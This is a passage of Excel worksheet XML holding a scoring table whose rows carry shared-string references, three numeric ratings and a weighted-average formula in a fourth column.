    <tableColumn id="4" name="Datasources" dataDxfId="3"/>
    <tableColumn id="5" name="Weights" dataDxfId="2"/>
    <tableColumn id="6" name=" " dataDxfId="1"/>
    <tableColumn id="7" name="Items in Refence vs Items in this sheet" dataDxfId="0"/>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431"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A48" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="B73" sqref="B73"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="34.85546875" customWidth="1"/>
    <col min="2" max="2" width="105.28515625" customWidth="1"/>
    <col min="3" max="5" width="20.7109375" style="2" customWidth="1"/>
    <col min="6" max="6" width="32.42578125" style="1" customWidth="1"/>
    <col min="7" max="26" width="9.140625" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="33" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>444</v>
      </c>
      <c r="B1" s="29" t="s">
        <v>445</v>
      </c>
      <c r="C1" s="30" t="s">
        <v>315</v>
      </c>
      <c r="D1" s="30" t="s">
        <v>318</v>
      </c>
      <c r="E1" s="30" t="s">
        <v>320</v>
      </c>
      <c r="F1" s="31" t="s">
        <v>446</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2" s="13" t="s">
        <v>447</v>
      </c>
      <c r="B2" s="13" t="s">
        <v>448</v>
      </c>
      <c r="C2" s="14">
        <v>0</v>
      </c>
      <c r="D2" s="14">
        <v>0</v>
      </c>
      <c r="E2" s="14">
        <v>0</v>
      </c>
      <c r="F2" s="32">
        <f t="shared" ref="F2:F6" si="0">((C2*2)+D2+(E2*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3" s="13" t="s">
        <v>447</v>
      </c>
      <c r="B3" s="13" t="s">
        <v>449</v>
      </c>
      <c r="C3" s="14">
        <v>0</v>
      </c>
      <c r="D3" s="14">
        <v>0</v>
      </c>
      <c r="E3" s="14">
        <v>0</v>
      </c>
      <c r="F3" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4" s="13" t="s">
        <v>447</v>
      </c>
      <c r="B4" s="13" t="s">
        <v>450</v>
      </c>
      <c r="C4" s="14">
        <v>0</v>
      </c>
      <c r="D4" s="14">
        <v>0</v>
      </c>
      <c r="E4" s="14">
        <v>0</v>
      </c>
      <c r="F4" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5" s="13" t="s">
        <v>447</v>
      </c>
      <c r="B5" s="13" t="s">
        <v>451</v>
      </c>
      <c r="C5" s="14">
        <v>5</v>
      </c>
      <c r="D5" s="14">
        <v>5</v>
      </c>
      <c r="E5" s="14">
        <v>5</v>
      </c>
      <c r="F5" s="32">
        <f>((C5*2)+D5+(E5*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6" s="13" t="s">
        <v>452</v>
      </c>
      <c r="B6" s="13"/>
      <c r="C6" s="14">
        <v>0</v>
      </c>
      <c r="D6" s="14">
        <v>0</v>
      </c>
      <c r="E6" s="14">
        <v>0</v>
      </c>
      <c r="F6" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7" s="13" t="s">
        <v>453</v>
      </c>
      <c r="B7" s="13" t="s">
        <v>454</v>
      </c>
      <c r="C7" s="14">
        <v>5</v>
      </c>
      <c r="D7" s="14">
        <v>5</v>
      </c>
      <c r="E7" s="14">
        <v>5</v>
      </c>
      <c r="F7" s="32">
        <f>((C7*2)+D7+(E7*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8" s="13" t="s">
        <v>453</v>
      </c>
      <c r="B8" s="13" t="s">
        <v>455</v>
      </c>
      <c r="C8" s="14">
        <v>5</v>
      </c>
      <c r="D8" s="14">
        <v>5</v>
      </c>
      <c r="E8" s="14">
        <v>5</v>
      </c>
      <c r="F8" s="32">
        <f t="shared" ref="F8:F51" si="1">((C8*2)+D8+(E8*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9" s="13" t="s">
        <v>453</v>
      </c>
      <c r="B9" s="13" t="s">
        <v>456</v>
      </c>
      <c r="C9" s="14">
        <v>3</v>
      </c>
      <c r="D9" s="14">
        <v>1</v>
      </c>
      <c r="E9" s="14">
        <v>1</v>
      </c>
      <c r="F9" s="32">
        <f t="shared" si="1"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10" s="13" t="s">
        <v>457</v>
      </c>
      <c r="B10" s="13"/>
      <c r="C10" s="14">
        <v>0</v>
      </c>
      <c r="D10" s="14">
        <v>0</v>
      </c>
      <c r="E10" s="14">
        <v>0</v>
      </c>
      <c r="F10" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11" s="13" t="s">
        <v>458</v>
      </c>
      <c r="B11" s="13"/>
      <c r="C11" s="14">
        <v>0</v>
      </c>
      <c r="D11" s="14">
        <v>0</v>
      </c>
      <c r="E11" s="14">
        <v>0</v>
      </c>
      <c r="F11" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12" s="13" t="s">
        <v>459</v>
      </c>
      <c r="B12" s="13" t="s">
        <v>460</v>
      </c>
      <c r="C12" s="14">
        <v>2.5</v>
      </c>
      <c r="D12" s="14">
        <v>1</v>
      </c>
      <c r="E12" s="14">
        <v>1</v>
      </c>
      <c r="F12" s="32">
        <f t="shared" si="1"/>
        <v>1.6</v>
      </c>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13" s="13" t="s">
        <v>461</v>
      </c>
      <c r="B13" s="13" t="s">
        <v>462</v>
      </c>
      <c r="C13" s="14">
        <v>0</v>
      </c>
      <c r="D13" s="14">
        <v>0</v>
      </c>
      <c r="E13" s="14">
        <v>0</v>
      </c>
      <c r="F13" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14" s="13" t="s">
        <v>463</v>
      </c>
      <c r="B14" s="13" t="s">
        <v>464</v>
      </c>
      <c r="C14" s="14">
        <v>3</v>
      </c>
      <c r="D14" s="14">
        <v>4</v>
      </c>
      <c r="E14" s="14">
        <v>5</v>
      </c>
      <c r="F14" s="32">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15" s="13" t="s">
        <v>465</v>
      </c>
      <c r="B15" s="13"/>
      <c r="C15" s="14">
        <v>0</v>
      </c>
      <c r="D15" s="14">
        <v>0</v>
      </c>
      <c r="E15" s="14">
        <v>0</v>
      </c>
      <c r="F15" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16" s="13" t="s">
        <v>466</v>
      </c>
      <c r="B16" s="13"/>
      <c r="C16" s="14">
        <v>0</v>
      </c>
      <c r="D16" s="14">
        <v>0</v>
      </c>
      <c r="E16" s="14">
        <v>0</v>
      </c>
      <c r="F16" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17" s="13" t="s">
        <v>467</v>
      </c>
      <c r="B17" s="13"/>
      <c r="C17" s="14">
        <v>0</v>
      </c>
      <c r="D17" s="14">
        <v>0</v>
      </c>
      <c r="E17" s="14">
        <v>0</v>
      </c>
      <c r="F17" s="32">
        <f>((C17*2)+D17+(E17*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18" s="13" t="s">
        <v>468</v>
      </c>
      <c r="B18" s="13" t="s">
        <v>469</v>
      </c>
      <c r="C18" s="14">
        <v>0</v>
      </c>
      <c r="D18" s="14">
        <v>0</v>
      </c>
      <c r="E18" s="14">
        <v>0</v>
      </c>
      <c r="F18" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19" s="13" t="s">
        <v>468</v>
      </c>
      <c r="B19" s="13" t="s">
        <v>470</v>
      </c>
      <c r="C19" s="14">
        <v>2</v>
      </c>
      <c r="D19" s="14">
        <v>4</v>
      </c>
      <c r="E19" s="14">
        <v>5</v>
      </c>
      <c r="F19" s="32">
        <f>((C19*2)+D19+(E19*2))/5</f>
        <v>3.6</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20" s="13" t="s">
        <v>468</v>
      </c>
      <c r="B20" s="13" t="s">
        <v>471</v>
      </c>
      <c r="C20" s="14">
        <v>2</v>
      </c>
      <c r="D20" s="14">
        <v>4</v>
      </c>
      <c r="E20" s="14">
        <v>5</v>
      </c>
      <c r="F20" s="32">
        <f>((C20*2)+D20+(E20*2))/5</f>
        <v>3.6</v>
      </c>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21" s="13" t="s">
        <v>468</v>
      </c>
      <c r="B21" s="13" t="s">
        <v>472</v>
      </c>
      <c r="C21" s="14">
        <v>2</v>
      </c>
      <c r="D21" s="14">
        <v>4</v>
      </c>
      <c r="E21" s="14">
        <v>5</v>
      </c>
      <c r="F21" s="32">
        <f>((C21*2)+D21+(E21*2))/5</f>
        <v>3.6</v>
      </c>
    </row>
    <row r="22" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22" s="13" t="s">
        <v>468</v>
      </c>
      <c r="B22" s="13" t="s">
        <v>473</v>
      </c>
      <c r="C22" s="14">
        <v>0</v>
      </c>
      <c r="D22" s="14">
        <v>0</v>
      </c>
      <c r="E22" s="14">
        <v>0</v>
      </c>
      <c r="F22" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="23" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23" s="13" t="s">
        <v>474</v>
      </c>
      <c r="B23" s="13"/>
      <c r="C23" s="14">
        <v>0</v>
      </c>
      <c r="D23" s="14">
        <v>0</v>
      </c>
      <c r="E23" s="14">
        <v>0</v>
      </c>
      <c r="F23" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24" s="13" t="s">
        <v>475</v>
      </c>
      <c r="B24" s="13" t="s">
        <v>476</v>
      </c>
      <c r="C24" s="14">
        <v>3</v>
      </c>
      <c r="D24" s="14">
        <v>5</v>
      </c>
      <c r="E24" s="14">
        <v>5</v>
      </c>
      <c r="F24" s="32">
        <f t="shared" si="1"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="25" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25" s="13" t="s">
        <v>475</v>
      </c>
      <c r="B25" s="13" t="s">
        <v>477</v>
      </c>
      <c r="C25" s="14">
        <v>0</v>
      </c>
      <c r="D25" s="14">
        <v>0</v>
      </c>
      <c r="E25" s="14">
        <v>0</v>
      </c>
      <c r="F25" s="32">
        <f>((C25*2)+D25+(E25*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26" s="13" t="s">
        <v>478</v>
      </c>
      <c r="B26" s="13" t="s">
        <v>464</v>
      </c>
      <c r="C26" s="14">
        <v>3</v>
      </c>
      <c r="D26" s="14">
        <v>5</v>
      </c>
      <c r="E26" s="14">
        <v>5</v>
      </c>
      <c r="F26" s="32">
        <f t="shared" si="1"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="27" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27" s="13" t="s">
        <v>479</v>
      </c>
      <c r="B27" s="13" t="s">
        <v>480</v>
      </c>
      <c r="C27" s="14">
        <v>0</v>
      </c>
      <c r="D27" s="14">
        <v>0</v>
      </c>
      <c r="E27" s="14">
        <v>0</v>
      </c>
      <c r="F27" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28" s="13" t="s">
        <v>479</v>
      </c>
      <c r="B28" s="13" t="s">
        <v>481</v>
      </c>
      <c r="C28" s="14">
        <v>3</v>
      </c>
      <c r="D28" s="14">
        <v>3</v>
      </c>
      <c r="E28" s="14">
        <v>5</v>
      </c>
      <c r="F28" s="32">
        <f>((C28*2)+D28+(E28*2))/5</f>
        <v>3.8</v>
      </c>
    </row>
    <row r="29" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29" s="13" t="s">
        <v>482</v>
      </c>
      <c r="B29" s="13"/>
      <c r="C29" s="14">
        <v>0</v>
      </c>
      <c r="D29" s="14">
        <v>0</v>
      </c>
      <c r="E29" s="14">
        <v>0</v>
      </c>
      <c r="F29" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30" s="13" t="s">
        <v>483</v>
      </c>
      <c r="B30" s="13"/>
      <c r="C30" s="14">
        <v>0</v>
      </c>
      <c r="D30" s="14">
        <v>0</v>
      </c>
      <c r="E30" s="14">
        <v>0</v>
      </c>
      <c r="F30" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A31" s="13" t="s">
        <v>484</v>
      </c>
      <c r="B31" s="13" t="s">
        <v>485</v>
      </c>
      <c r="C31" s="14">
        <v>0</v>
      </c>
      <c r="D31" s="14">
        <v>0</v>
      </c>
      <c r="E31" s="14">
        <v>0</v>
      </c>
      <c r="F31" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="32" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A32" s="13" t="s">
        <v>486</v>
      </c>
      <c r="B32" s="13" t="s">
        <v>487</v>
      </c>
      <c r="C32" s="14">
        <v>5</v>
      </c>
      <c r="D32" s="14">
        <v>5</v>
      </c>
      <c r="E32" s="14">
        <v>5</v>
      </c>
      <c r="F32" s="32">
        <f>((C32*2)+D32+(E32*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="33" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A33" s="13" t="s">
        <v>486</v>
      </c>
      <c r="B33" s="13" t="s">
        <v>488</v>
      </c>
      <c r="C33" s="14">
        <v>4</v>
      </c>
      <c r="D33" s="14">
        <v>4</v>
      </c>
      <c r="E33" s="14">
        <v>5</v>
      </c>
      <c r="F33" s="32">
        <f t="shared" si="1"/>
        <v>4.4000000000000004</v>
      </c>
    </row>
    <row r="34" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A34" s="13" t="s">
        <v>489</v>
      </c>
      <c r="B34" s="13" t="s">
        <v>490</v>
      </c>
      <c r="C34" s="14">
        <v>0</v>
      </c>
      <c r="D34" s="14">
        <v>0</v>
      </c>
      <c r="E34" s="14">
        <v>0</v>
      </c>
      <c r="F34" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A35" s="13" t="s">
        <v>491</v>
      </c>
      <c r="B35" s="13" t="s">
        <v>492</v>
      </c>
      <c r="C35" s="14">
        <v>0</v>
      </c>
      <c r="D35" s="14">
        <v>0</v>
      </c>
      <c r="E35" s="14">
        <v>0</v>
      </c>
      <c r="F35" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A36" s="13" t="s">
        <v>491</v>
      </c>
      <c r="B36" s="13" t="s">
        <v>493</v>
      </c>
      <c r="C36" s="14">
        <v>0</v>
      </c>
      <c r="D36" s="14">
        <v>0</v>
      </c>
      <c r="E36" s="14">
        <v>0</v>
      </c>
      <c r="F36" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A37" s="13" t="s">
        <v>494</v>
      </c>
      <c r="B37" s="13" t="s">
        <v>495</v>
      </c>
      <c r="C37" s="14">
        <v>1</v>
      </c>
      <c r="D37" s="14">
        <v>1</v>
      </c>
      <c r="E37" s="14">
        <v>1</v>
      </c>
      <c r="F37" s="32">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A38" s="13" t="s">
        <v>494</v>
      </c>
      <c r="B38" s="13" t="s">
        <v>496</v>
      </c>
      <c r="C38" s="14">
        <v>5</v>
      </c>
      <c r="D38" s="14">
        <v>5</v>
      </c>
      <c r="E38" s="14">
        <v>5</v>
      </c>
      <c r="F38" s="32">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="39" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A39" s="13" t="s">
        <v>494</v>
      </c>
      <c r="B39" s="13" t="s">
        <v>495</v>
      </c>
      <c r="C39" s="14">
        <v>1</v>
      </c>
      <c r="D39" s="14">
        <v>1</v>
      </c>
      <c r="E39" s="14">
        <v>1</v>
      </c>
      <c r="F39" s="32">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A40" s="13" t="s">
        <v>497</v>
      </c>
      <c r="B40" s="13" t="s">
        <v>495</v>
      </c>
      <c r="C40" s="14">
        <v>1</v>
      </c>
      <c r="D40" s="14">
        <v>1</v>
      </c>
      <c r="E40" s="14">
        <v>1</v>
      </c>
      <c r="F40" s="32">
        <f>((C40*2)+D40+(E40*2))/5</f>
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A41" s="13" t="s">
        <v>497</v>
      </c>
      <c r="B41" s="13" t="s">
        <v>498</v>
      </c>
      <c r="C41" s="14">
        <v>5</v>
      </c>
      <c r="D41" s="14">
        <v>5</v>
      </c>
      <c r="E41" s="14">
        <v>5</v>
      </c>
      <c r="F41" s="32">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="42" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A42" s="13" t="s">
        <v>497</v>
      </c>
      <c r="B42" s="13" t="s">
        <v>496</v>
      </c>
      <c r="C42" s="14">
        <v>5</v>
      </c>
      <c r="D42" s="14">
        <v>5</v>
      </c>
      <c r="E42" s="14">
        <v>5</v>
      </c>
      <c r="F42" s="32">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="43" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A43" s="13" t="s">
        <v>497</v>
      </c>
      <c r="B43" s="13" t="s">
        <v>499</v>
      </c>
      <c r="C43" s="14">
        <v>5</v>
      </c>
      <c r="D43" s="14">
        <v>5</v>
      </c>
      <c r="E43" s="14">
        <v>5</v>
      </c>
      <c r="F43" s="32">
        <f t="shared" ref="F43:F48" si="2">((C43*2)+D43+(E43*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="44" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A44" s="13" t="s">
        <v>497</v>
      </c>
      <c r="B44" s="13" t="s">
        <v>500</v>
      </c>
      <c r="C44" s="14">
        <v>5</v>
      </c>
      <c r="D44" s="14">
        <v>5</v>
      </c>
      <c r="E44" s="14">
        <v>5</v>
      </c>
      <c r="F44" s="32">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
    </row>
    <row r="45" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A45" s="13" t="s">
        <v>497</v>
      </c>
      <c r="B45" s="13" t="s">
        <v>501</v>
      </c>
      <c r="C45" s="14">
        <v>0</v>
      </c>
      <c r="D45" s="14">
        <v>0</v>
      </c>
      <c r="E45" s="14">
        <v>0</v>
      </c>
      <c r="F45" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="46" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A46" s="13" t="s">
        <v>497</v>
      </c>
      <c r="B46" s="13" t="s">
        <v>502</v>
      </c>
      <c r="C46" s="14">
        <v>0</v>
      </c>
      <c r="D46" s="14">
        <v>0</v>
      </c>
      <c r="E46" s="14">
        <v>0</v>
      </c>
      <c r="F46" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A47" s="13" t="s">
        <v>503</v>
      </c>
      <c r="B47" s="13" t="s">
        <v>504</v>
      </c>
      <c r="C47" s="14">
        <v>1</v>
      </c>
      <c r="D47" s="14">
        <v>5</v>
      </c>
      <c r="E47" s="14">
        <v>1</v>
      </c>
      <c r="F47" s="32">
        <f t="shared" si="2"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="48" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A48" s="13" t="s">
        <v>503</v>
      </c>
      <c r="B48" s="13" t="s">
        <v>505</v>
      </c>
      <c r="C48" s="14">
        <v>5</v>
      </c>
      <c r="D48" s="14">
        <v>4</v>
      </c>
      <c r="E48" s="14">
        <v>5</v>
      </c>
      <c r="F48" s="32">
        <f t="shared" si="2"/>
        <v>4.8</v>
      </c>
    </row>
    <row r="49" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A49" s="13" t="s">
        <v>503</v>
      </c>
      <c r="B49" s="13" t="s">
        <v>506</v>
      </c>
      <c r="C49" s="14">
        <v>5</v>
      </c>
      <c r="D49" s="14">
        <v>4</v>
      </c>
      <c r="E49" s="14">
        <v>5</v>
      </c>
      <c r="F49" s="32">
        <f t="shared" ref="F49:F50" si="3">((C49*2)+D49+(E49*2))/5</f>
        <v>4.8</v>
      </c>
    </row>
    <row r="50" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A50" s="13" t="s">
        <v>503</v>
      </c>
      <c r="B50" s="13" t="s">
        <v>507</v>
      </c>
      <c r="C50" s="14">
        <v>5</v>
      </c>
      <c r="D50" s="14">
        <v>4</v>
      </c>
      <c r="E50" s="14">
        <v>5</v>
      </c>
      <c r="F50" s="32">
        <f t="shared" si="3"/>
        <v>4.8</v>
      </c>
    </row>
    <row r="51" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A51" s="13" t="s">
        <v>508</v>
      </c>
      <c r="B51" s="13" t="s">
        <v>509</v>
      </c>
      <c r="C51" s="14">
        <v>5</v>
      </c>
      <c r="D51" s="14">
        <v>5</v>
      </c>
      <c r="E51" s="14">
        <v>5</v>
      </c>
      <c r="F51" s="32">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="52" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A52" s="13" t="s">
        <v>508</v>
      </c>
      <c r="B52" s="13" t="s">
        <v>510</v>
      </c>
      <c r="C52" s="14">
        <v>5</v>
      </c>
      <c r="D52" s="14">
        <v>5</v>
      </c>
      <c r="E52" s="14">
        <v>5</v>
      </c>
      <c r="F52" s="32">
        <f>((C52*2)+D52+(E52*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="53" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A53" s="13" t="s">
        <v>508</v>
      </c>
      <c r="B53" s="13" t="s">
        <v>511</v>
      </c>
      <c r="C53" s="14">
        <v>1</v>
      </c>
      <c r="D53" s="14">
        <v>5</v>
      </c>
      <c r="E53" s="14">
        <v>5</v>
      </c>
      <c r="F53" s="32">
        <f>((C53*2)+D53+(E53*2))/5</f>
        <v>3.4</v>
      </c>
    </row>
    <row r="54" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A54" s="13" t="s">
        <v>508</v>
      </c>
      <c r="B54" s="13" t="s">
        <v>512</v>
      </c>
      <c r="C54" s="14">
        <v>0</v>
      </c>
      <c r="D54" s="14">
        <v>0</v>
      </c>
      <c r="E54" s="14">
        <v>0</v>
      </c>
      <c r="F54" s="32">
        <f>((C54*2)+D54+(E54*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="55" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A55" s="13" t="s">
        <v>508</v>
      </c>
      <c r="B55" s="13" t="s">
        <v>513</v>
      </c>
      <c r="C55" s="14">
        <v>0</v>
      </c>
      <c r="D55" s="14">
        <v>0</v>
      </c>
      <c r="E55" s="14">
        <v>0</v>
      </c>
      <c r="F55" s="32">
        <f t="shared" ref="F55:F118" si="4">((C55*2)+D55+(E55*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A56" s="13" t="s">
        <v>514</v>
      </c>
      <c r="B56" s="13" t="s">
        <v>515</v>
      </c>
      <c r="C56" s="14">
        <v>0</v>
      </c>
      <c r="D56" s="14">
        <v>0</v>
      </c>
      <c r="E56" s="14">
        <v>0</v>
      </c>
      <c r="F56" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="57" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A57" s="13" t="s">
        <v>514</v>
      </c>
      <c r="B57" s="13" t="s">
        <v>516</v>
      </c>
      <c r="C57" s="14">
        <v>0</v>
      </c>
      <c r="D57" s="14">
        <v>0</v>
      </c>
      <c r="E57" s="14">
        <v>0</v>
      </c>
      <c r="F57" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="58" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A58" s="13" t="s">
        <v>514</v>
      </c>
      <c r="B58" s="13" t="s">
        <v>517</v>
      </c>
      <c r="C58" s="14">
        <v>0</v>
      </c>
      <c r="D58" s="14">
        <v>0</v>
      </c>
      <c r="E58" s="14">
        <v>0</v>
      </c>
      <c r="F58" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A59" s="13" t="s">
        <v>518</v>
      </c>
      <c r="B59" s="13" t="s">
        <v>519</v>
      </c>
      <c r="C59" s="14">
        <v>4</v>
      </c>
      <c r="D59" s="14">
        <v>5</v>
      </c>
      <c r="E59" s="14">
        <v>5</v>
      </c>
      <c r="F59" s="32">
        <f t="shared" si="4"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="60" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A60" s="13" t="s">
        <v>520</v>
      </c>
      <c r="B60" s="13"/>
      <c r="C60" s="14">
        <v>0</v>
      </c>
      <c r="D60" s="14">
        <v>0</v>
      </c>
      <c r="E60" s="14">
        <v>0</v>
      </c>
      <c r="F60" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A61" s="13" t="s">
        <v>521</v>
      </c>
      <c r="B61" s="13"/>
      <c r="C61" s="14">
        <v>0</v>
      </c>
      <c r="D61" s="14">
        <v>0</v>
      </c>
      <c r="E61" s="14">
        <v>0</v>
      </c>
      <c r="F61" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="62" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A62" s="13" t="s">
        <v>522</v>
      </c>
      <c r="B62" s="13"/>
      <c r="C62" s="14">
        <v>0</v>
      </c>
      <c r="D62" s="14">
        <v>0</v>
      </c>
      <c r="E62" s="14">
        <v>0</v>
      </c>
      <c r="F62" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="63" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A63" s="13" t="s">
        <v>523</v>
      </c>
      <c r="B63" s="13"/>
      <c r="C63" s="14">
        <v>0</v>
      </c>
      <c r="D63" s="14">
        <v>0</v>
      </c>
      <c r="E63" s="14">
        <v>0</v>
      </c>
      <c r="F63" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="64" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A64" s="13" t="s">
        <v>524</v>
      </c>
      <c r="B64" s="13" t="s">
        <v>525</v>
      </c>
      <c r="C64" s="14">
        <v>0</v>
      </c>
      <c r="D64" s="14">
        <v>0</v>
      </c>
      <c r="E64" s="14">
        <v>0</v>
      </c>
      <c r="F64" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="65" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A65" s="13" t="s">
        <v>526</v>
      </c>
      <c r="B65" s="13" t="s">
        <v>527</v>
      </c>
      <c r="C65" s="14">
        <v>0</v>
      </c>
      <c r="D65" s="14">
        <v>0</v>
      </c>
      <c r="E65" s="14">
        <v>0</v>
      </c>
      <c r="F65" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="66" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A66" s="13" t="s">
        <v>526</v>
      </c>
      <c r="B66" s="13" t="s">
        <v>528</v>
      </c>
